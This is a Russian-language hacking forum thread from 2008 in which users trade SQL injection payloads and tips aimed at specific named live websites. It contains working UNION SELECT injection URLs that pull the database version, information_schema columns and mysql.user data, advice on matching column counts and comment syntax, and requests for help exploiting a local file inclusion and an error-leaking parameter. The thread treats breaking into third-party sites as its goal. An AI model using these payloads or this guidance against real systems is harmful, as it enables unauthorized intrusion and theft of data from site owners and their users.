 |
|
02.12.2008, 21:26
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами:
9387494
Репутация:
36
|
|
Да с синтаксис SQL я знаю неоч! Но факт остается фактом! Этот вариант прокатывает во многих случаях!!!
|
|
|
02.12.2008, 21:27
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Сообщение от BanQui
Хммм в большенстве случаев этот вариант прокатывает!!!
Гениально! Главное сказать и не важно что не правильно.
Оператор order by сортирует результат запроса, а отсортировывать пустой результат (а со значением -1 другого и не будет) - не самая лучшая идея.
Использовать order by нужно только при существующих значениях.
Ошибка в данном случае была в использование /* - в новых версиях мускула нельзя не закрывать этот комментарий, а значит теперь обходимся комментариями '#' и '-- '.
|
|
|
|
02.12.2008, 21:37
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами:
9574565
Репутация:
712
|
|
Чего опять ему надо ?((
http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,version( ),3,4-- (безрезультатно()
serverstats.php?serverid=1+union+select+1,column_n ame,3,4+from+information_schema.columns.--
тоже /=
serverstats.php?serverid=1+union+select+1,column_n ame,3,4+from+information_schema.columns.+limit+1,1--
даже версию не посмотреть(
|
|
|
|
02.12.2008, 21:41
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
mysql error: The used SELECT statements have a different number of columns
читай  Сначала кол-во колонок подбери |
|
|
|
02.12.2008, 21:57
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами:
9387494
Репутация:
36
|
|
Блин на мой вопрос с ПХП кто нибуть ответит??? Если кто не видел вот он :
Сообщение от BanQui
Такой вопрос! Если есть сайт и на нем присутствует локальный инклуд! Как можно его раскрутить если на сайт загрузить ничего нельзя(ну по крайней мере такой функции нет в меню на сайта)!? Может есть какие-то пути? Или это просто нашел да и х*р с ним!?
------------------------------------
Сообщение от -m0rgan-
Почитай здесь:
http://forum.antichat.ru/thread12123.html
Я там не понял как именно добавлять файл! Читал раз 5!!! Как китайский блин!!! |
|
|
|
03.12.2008, 01:58
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
geforse
помоему 2 и 3 принтабельные.. но вывода не увидел, логический вывод:
http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,unhex(he x(version())),3,4+from+information_schema.tables--
5 ветка..
http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,unhex(he x(version())),3,4+from+mysql.user--
с правами
|
|
|
|
03.12.2008, 05:14
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 1
С нами:
9228480
Репутация:
0
|
|
как раскрутить?
http://www.ushkalenko.ru/guestbook/index.php?mz_module=guestbook&mz_page=-1
|
|
|
|
03.12.2008, 08:24
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Sanic1977
никак нема иьекта )
|
|
|
|
03.12.2008, 08:30
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 28
С нами:
9198543
Репутация:
15
|
|
http://www.ushkalenko.ru/guestbook/index.php?mz_module=guestbook&mz_page=-1
инъект отсутствует
|
|
|
|
03.12.2008, 22:24
|
|
Новичок
Регистрация: 25.10.2006
Сообщений: 10
С нами:
10285880
Репутация:
1
|
|
http://www.comingsoon.net/news.php?id=1'
Получил вот такой ответ
Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'
Есть ли тут injection? Если есть пожалуйста помогите раскрутить а то чет никак не могу понять как запросик зделать.
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
